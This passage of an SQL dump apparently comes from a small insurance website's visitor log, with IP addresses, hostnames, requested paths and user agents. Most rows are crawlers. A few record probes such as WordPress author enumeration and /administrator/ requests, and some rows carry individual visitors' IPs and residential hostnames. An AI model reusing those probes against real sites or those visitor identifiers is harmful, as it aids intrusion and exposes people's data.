http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(25680,'0b_4016b90093db8ffb576a450bf49681b4','1462575626','68.180.230.123','b115363.yse.yahoo.net','/term-quotes/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(25683,'0b_6c762b7862909b5690a292d5c28f953b','1462576298','66.249.83.133,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(25685,'0b_76f01aa66d16931bc22f35bc22da10c8','1462576299','66.249.83.147,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(25686,'0b_f358ceb56c5e6cf99245c0b6477743b1','1462577568','142.4.216.172','ns517733.ip-142-4-216.net','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','us','','','','','','','3','0',0),(25689,'0b_225d69dabef13b57c2efe2d33054d10f','1462577569','142.4.216.172','ns517733.ip-142-4-216.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25692,'0b_225d69dabef13b57c2efe2d33054d10f','1462577571','142.4.216.172','ns517733.ip-142-4-216.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25695,'0b_225d69dabef13b57c2efe2d33054d10f','1462577571','142.4.216.172','ns517733.ip-142-4-216.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25698,'0b_225d69dabef13b57c2efe2d33054d10f','1462577572','142.4.216.172','ns517733.ip-142-4-216.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25700,'0b_225d69dabef13b57c2efe2d33054d10f','1462577573','142.4.216.172','ns517733.ip-142-4-216.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25703,'0b_f358ceb56c5e6cf99245c0b6477743b1','1462577574','142.4.216.172','ns517733.ip-142-4-216.net','/register/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','us','','','','','','','3','0',0),(25704,'0b_f358ceb56c5e6cf99245c0b6477743b1','1462577574','142.4.216.172','ns517733.ip-142-4-216.net','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','us','','','','','','','3','0',0),(25706,'0b_225d69dabef13b57c2efe2d33054d10f','1462577575','142.4.216.172','ns517733.ip-142-4-216.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25709,'0b_109494b2cd4db89fe2b221abbf3341ff','1462577576','142.4.216.172','ns517733.ip-142-4-216.net','/insentives/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','','',0,'Win8 x64','IE 10','us','','','','','','','0','0',0),(25712,'0b_109494b2cd4db89fe2b221abbf3341ff','1462577576','142.4.216.172','ns517733.ip-142-4-216.net','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','','',0,'Win8 x64','IE 10','us','','','','','','','0','0',0),(25713,'0b_225d69dabef13b57c2efe2d33054d10f','1462577577','142.4.216.172','ns517733.ip-142-4-216.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25715,'0b_109494b2cd4db89fe2b221abbf3341ff','1462577578','142.4.216.172','ns517733.ip-142-4-216.net','/contact/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','','',0,'Win8 x64','IE 10','us','','','','','','','0','0',0),(25716,'0b_109494b2cd4db89fe2b221abbf3341ff','1462577579','142.4.216.172','ns517733.ip-142-4-216.net','/case-status/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','','',0,'Win8 x64','IE 10','us','','','','','','','0','0',0),(25719,'0b_225d69dabef13b57c2efe2d33054d10f','1462577579','142.4.216.172','ns517733.ip-142-4-216.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25721,'0b_109494b2cd4db89fe2b221abbf3341ff','1462577582','142.4.216.172','ns517733.ip-142-4-216.net','/igo/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','','',0,'Win8 x64','IE 10','us','','','','','','','0','0',0),(25724,'0b_225d69dabef13b57c2efe2d33054d10f','1462577584','142.4.216.172','ns517733.ip-142-4-216.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25725,'0b_f358ceb56c5e6cf99245c0b6477743b1','1462577585','142.4.216.172','ns517733.ip-142-4-216.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','us','','','','','','','3','0',0),(25727,'0b_109494b2cd4db89fe2b221abbf3341ff','1462577586','142.4.216.172','ns517733.ip-142-4-216.net','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','','',0,'Win8 x64','IE 10','us','','','','','','','0','0',0),(25730,'0b_f358ceb56c5e6cf99245c0b6477743b1','1462577587','142.4.216.172','ns517733.ip-142-4-216.net','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','us','','','','','','','3','0',0),(25731,'0b_f358ceb56c5e6cf99245c0b6477743b1','1462577587','142.4.216.172','ns517733.ip-142-4-216.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','us','','','','','','','3','0',0),(25733,'0b_f358ceb56c5e6cf99245c0b6477743b1','1462577588','142.4.216.172','ns517733.ip-142-4-216.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','us','','','','','','','3','0',0),(25734,'0b_f358ceb56c5e6cf99245c0b6477743b1','1462577589','142.4.216.172','ns517733.ip-142-4-216.net','/?page_id=169','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','us','','','','','','','3','0',0),(25736,'0b_f358ceb56c5e6cf99245c0b6477743b1','1462577589','142.4.216.172','ns517733.ip-142-4-216.net','/register/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','us','','','','','','','3','0',0),(25739,'0b_225d69dabef13b57c2efe2d33054d10f','1462577590','142.4.216.172','ns517733.ip-142-4-216.net','/about-us/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25740,'0b_225d69dabef13b57c2efe2d33054d10f','1462577590','142.4.216.172','ns517733.ip-142-4-216.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25743,'0b_225d69dabef13b57c2efe2d33054d10f','1462577591','142.4.216.172','ns517733.ip-142-4-216.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25746,'0b_225d69dabef13b57c2efe2d33054d10f','1462577592','142.4.216.172','ns517733.ip-142-4-216.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','us','','','','','','','0','0',0),(25749,'0b_3ec2b742bfd17ce7a89e4a1f6b4ba6f6','1462578524','107.172.235.139','107-172-235-139-host.colocrossing.com','/register/','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 34','us','','','','','','','0','0',0),(25751,'0b_f9c976e9343b2bd2eedb429fa7da8eb6','1462578695','54.175.120.101','ec2-54-175-120-101.compute-1.amazonaws.com','/term-quotes/','User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31','','',0,'Win7','','','','','Internet','','','','0','0',0),(25752,'0b_2312c4dbf668bf94db8c4d79186a3454','1462580480','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(25754,'0b_1a4bedd8042ab67733c397aca6629de0','1462582135','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/forms','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(25755,'0b_1a4bedd8042ab67733c397aca6629de0','1462582530','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25757,'0b_1a4bedd8042ab67733c397aca6629de0','1462582580','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/forms/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(25758,'0b_9732b314e1e1c972d6dc00d77ce4d08d','1462585400','141.8.143.235','spider-141-8-143-235.yandex.com','/calc.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','tr','','','Yandex','','','','0','0',0),(25761,'0b_403eeba94de016e4d16648c8e2ab763f','1462586296','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25764,'0b_bb4fd2cdfa4760780c5d41784f2dc773','1462586416','52.71.64.37','ec2-52-71-64-37.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31','','',0,'MacOSX','Chrome 26','','','','','','','','0','0',0),(25767,'0b_6ca5937f93dc4cb8706cfe56b8e23d4d','1462588001','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25770,'0b_79a98699f3a6890c270dbb61c8fd78cf','1462588003','199.185.0.215','199.185.0.215','/robots.txt','VSE/1.0 (rabraham@multiview.com)','','',0,'','','','','','VSE','','','','0','0',0),(25772,'0b_79a98699f3a6890c270dbb61c8fd78cf','1462588028','199.185.0.215','199.185.0.215','/','VSE/1.0 (rabraham@multiview.com)','','',0,'','','','','','VSE','','','','0','0',0),(25775,'0b_6b0bdaa2f544b63fe358e44e386c8a4d','1462588459','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25778,'0b_60479a4fec93a338d5b43e23cd46f366','1462588893','199.185.0.215','199.185.0.215','/robots.txt','VSE/1.0 (rabraham@multiview.com)','','',0,'','','','','','VSE','','','','0','0',0),(25779,'0b_60479a4fec93a338d5b43e23cd46f366','1462588906','199.185.0.215','199.185.0.215','/','VSE/1.0 (rabraham@multiview.com)','','',0,'','','','','','VSE','','','','0','0',0),(25782,'0b_a502d7836af700ba242ae0424f1d650f','1462589058','66.249.64.89','crawl-66-249-64-89.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25784,'0b_a502d7836af700ba242ae0424f1d650f','1462589178','66.249.64.94','crawl-66-249-64-94.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(25785,'0b_a502d7836af700ba242ae0424f1d650f','1462589179','66.249.64.29','crawl-66-249-64-29.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25788,'0b_97a5d1354c6469ec1f0ee4ee0e763ae6','1462590615','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25791,'0b_de833164eaf710fcec55e032ade2d73a','1462592412','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)','http://forum.tvmir.org/','',0,'WinNT','IE 5','','','','','','','','0','0',0),(25794,'0b_de833164eaf710fcec55e032ade2d73a','1462592412','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)','http://forum.tvmir.org/','',0,'WinNT','IE 5','','','','','','','','0','0',0),(25797,'0b_bc2eda432847f2dfe6a359a3cf05a4be','1462593141','67.213.223.155','67.213.223.155-static.reverse.softlayer.com','/','Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)','','',0,'WinVista x64','IE 9','us','','','','','','','0','0',0),(25800,'0b_6c0ca6ba40c199a401c77bf80b95c309','1462593142','107.155.196.10','107.155.196.10','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','us','','','','','','','0','0',0),(25802,'0b_8974a4645175791b733b21604f88312c','1462593912','207.46.13.127','msnbot-207-46-13-127.search.msn.com','[404] /documents/SunlifeBonus.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25805,'0b_083fd7deb1ced21390447b6031a2bdd9','1462595080','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25806,'0b_f9953651e1c4fc2097ce8b3d08505952','1462595422','66.249.64.29','crawl-66-249-64-29.googlebot.com','/case-status/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25808,'0b_5c33656695b0cc03342feaf8eaf0748f','1462597448','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25811,'0b_9747e598d7e7200d2ff00a66368e24f8','1462597897','5.153.233.130','5.153.233.130','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(25814,'0b_9747e598d7e7200d2ff00a66368e24f8','1462597906','5.153.233.130','5.153.233.130','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(25815,'0b_9747e598d7e7200d2ff00a66368e24f8','1462597917','5.153.233.130','5.153.233.130','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(25817,'0b_6b97648c645bcc9a715e89a208f128ca','1462602275','213.251.184.38','ns322237.ip-213-251-184.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(25820,'0b_6b97648c645bcc9a715e89a208f128ca','1462602283','213.251.184.38','ns322237.ip-213-251-184.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(25821,'0b_b814179d006a631a553b496f1360c5da','1462603684','208.115.111.66','208-115-111-66-reverse.wowrack.com','/forms/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25823,'0b_27b44e0dc300801dab293d3eb550dbdb','1462603827','66.249.83.144,98.117.169.157','pool-98-117-169-157.bflony.fios.verizon.net','/','Mozilla/5.0 (Linux; Android 6.0.99; Build/NPC91K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2723.0 Mobile Safari/537.36','android-app://com.google.android.googlequicksearchbox','',0,'Android 6','Chrome 52 Mobile','us','','','','','','','0','0',0),(25824,'0b_aa8dc15f1afb66c13cebc08a7e21fecf','1462603829','66.249.83.150,98.117.169.157','pool-98-117-169-157.bflony.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 6.0.99; Build/NPC91K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2723.0 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 6','Chrome 52 Mobile','us','','','','','','','0','0',0),(25827,'0b_3c3413c236e632c4a2f6de95d4d1b033','1462604848','157.55.39.54','msnbot-157-55-39-54.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25830,'0b_2ab9dfeb7101c903293dde8e5a591793','1462604880','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25832,'0b_a22669bfd2ea0cab710d35312897ada1','1462604960','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25833,'0b_874ec500303331a2d0ff147a7f0817b5','1462606204','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(25836,'0b_075d89ec8c96ba27c121ec40cc1978ce','1462606210','141.8.143.235','spider-141-8-143-235.yandex.com','/agent-tools/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(25838,'0b_7e1ba2321d689646002fcf114e808c56','1462607262','66.249.64.62','crawl-66-249-64-62.googlebot.com','/.well-known/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25839,'0b_7e1ba2321d689646002fcf114e808c56','1462607269','66.249.64.57','crawl-66-249-64-57.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25842,'0b_7e1ba2321d689646002fcf114e808c56','1462607432','66.249.64.94','crawl-66-249-64-94.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25844,'0b_45c677bf2966982f51beb4acf75f3e1d','1462607840','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(25845,'0b_734ae8d987175930f62e7445e4e5ab2e','1462607855','199.30.25.44','msnbot-199-30-25-44.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(25848,'0b_99631204f34e70efb8c75ef9f506fe78','1462608174','40.77.167.92','msnbot-40-77-167-92.search.msn.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25851,'0b_0c460bd8f85e12044e516f25baf26fc9','1462608893','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25854,'0b_44aca62440e11887440298993d8c8819','1462609981','144.76.7.107','mj2.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(25856,'0b_44aca62440e11887440298993d8c8819','1462609990','144.76.7.107','mj2.naefmarco.ch','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(25857,'0b_196db0d1c21e287247784287e1e18fdd','1462611019','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25860,'0b_9b0201e288b6ed590a8f0f8656b01622','1462611147','66.249.64.24','crawl-66-249-64-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25863,'0b_7c504d0a10d3488200bc536e90095011','1462612726','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(25865,'0b_a51046da0d843cc5503716a30ba43598','1462618277','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','http://fm-upgrade.ru/','',0,'WinXP','IE 7','','','','','','','','0','0',0),(25868,'0b_52f6463de71d3914c8dbf6bdf7a044f4','1462618519','148.251.153.69','static.69.153.251.148.clients.your-server.de','/calc.html','WordPress/4.3.1; http://mortgagedebtor.com','','',0,'','','de','','','WordPress','','','','0','0',0),(25869,'0b_4f70fbd94d1673fb9c00cbcfe9d51600','1462618722','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25871,'0b_a9fe25a10a34c6291a07fd8d6a40006d','1462626628','66.249.64.29','crawl-66-249-64-29.googlebot.com','/quotes.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25872,'0b_fad99586cafc1ee3b34576596ce7fdb3','1462627473','62.210.152.87','62-210-152-87.rev.poneytelecom.eu','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','eu','','','','','','','0','0',0),(25875,'0b_22f0a5d0b73fecc30528139c23773d58','1462628646','69.170.216.69','69-216-170-69.skybeam.com','/administrator/','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Win7','Firefox 31','ot','','','','','','','0','0',0),(25878,'0b_783e9d238901686ca40acb62b340343b','1462630946','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25880,'0b_bb70c8ae92c0ce360860e6de6469ad1c','1462632004','217.69.133.68','fetcher2.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(25881,'0b_bb70c8ae92c0ce360860e6de6469ad1c','1462632007','217.69.133.68','fetcher2.p.mail.ru','/resources.htm','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(25883,'0b_bb70c8ae92c0ce360860e6de6469ad1c','1462632011','217.69.133.68','fetcher2.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(25884,'0b_5fdb83b7c147042558a3f56c9faa592f','1462632013','217.69.133.226','fetcher2-7.p.mail.ru','/resources.htm','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/resources.htm','',0,'Linux','','ru','','','RU_Bot','','','','0','0',0),(25886,'0b_fd120ff14bb3aff8ce49f3d946751739','1462632042','69.30.213.202','69.30.213.202','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(25889,'0b_fd120ff14bb3aff8ce49f3d946751739','1462632053','69.30.213.202','69.30.213.202','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(25890,'0b_fd120ff14bb3aff8ce49f3d946751739','1462632064','69.30.213.202','69.30.213.202','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(25892,'0b_fd120ff14bb3aff8ce49f3d946751739','1462632076','69.30.213.202','69.30.213.202','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(25895,'0b_fd120ff14bb3aff8ce49f3d946751739','1462632086','69.30.213.202','69.30.213.202','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; 